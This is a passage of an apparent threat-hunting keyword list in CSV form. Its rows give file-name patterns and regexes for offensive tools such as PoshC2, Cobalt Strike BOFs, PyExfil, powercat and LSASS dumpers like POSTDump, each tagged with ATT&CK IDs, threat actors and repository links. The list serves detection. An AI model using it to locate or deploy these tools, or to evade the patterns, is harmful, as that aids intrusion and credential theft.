"*/PoolParty.sln*",".{0,1000}\/PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.vcxproj*",".{0,1000}\/PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolPartyBof.c*",".{0,1000}\/PoolPartyBof\.c.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/PoolPartyBof.x64.o*",".{0,1000}\/PoolPartyBof\.x64\.o.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/pop_exfil_client.py*",".{0,1000}\/pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - 
TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pop_exfil_server.py*",".{0,1000}\/pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pop3-brute.nse*",".{0,1000}\/pop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-capabilities.nse*",".{0,1000}\/pop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-ntlm-info.nse*",".{0,1000}\/pop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/popCalc.bin*",".{0,1000}\/popCalc\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/port_reuse.py*",".{0,1000}\/port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/port_scan.py*",".{0,1000}\/port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PortBender/*",".{0,1000}\/PortBender\/.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*/portscan.cna*",".{0,1000}\/portscan\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/portscan.git*",".{0,1000}\/portscan\.git.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*/portscan.yaml*",".{0,1000}\/portscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation 
Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/portscan/releases/*",".{0,1000}\/portscan\/releases\/.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*/port-states.nse*",".{0,1000}\/port\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/POSeidon.profile*",".{0,1000}\/POSeidon\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/posh.key*",".{0,1000}\/posh\.key.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh.tpl*",".{0,1000}\/posh\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/PoshC2*",".{0,1000}\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. 
DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/poshc2-*",".{0,1000}\/poshc2\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/PoshC2/*",".{0,1000}\/PoshC2\/.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-config*",".{0,1000}\/posh\-config.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-log*",".{0,1000}\/posh\-log.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-project*",".{0,1000}\/posh\-project.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - 
T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-server*",".{0,1000}\/posh\-server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-service*",".{0,1000}\/posh\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 
"*/posh-stop-service*",".{0,1000}\/posh\-stop\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/posh-update*",".{0,1000}\/posh\-update.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/post_exploitation*",".{0,1000}\/post_exploitation.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential 
Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/POSTDump.sln*",".{0,1000}\/POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*/postLegit/grkg*",".{0,1000}\/postLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/postLegit/qhwl*",".{0,1000}\/postLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/PotentiallyCrackableAccounts.ps1*",".{0,1000}\/PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/PowerBruteLogon*",".{0,1000}\/PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*/powercat.git*",".{0,1000}\/powercat\.git.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*/powercat.ps1",".{0,1000}\/powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/powercat.ps1*",".{0,1000}\/powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - 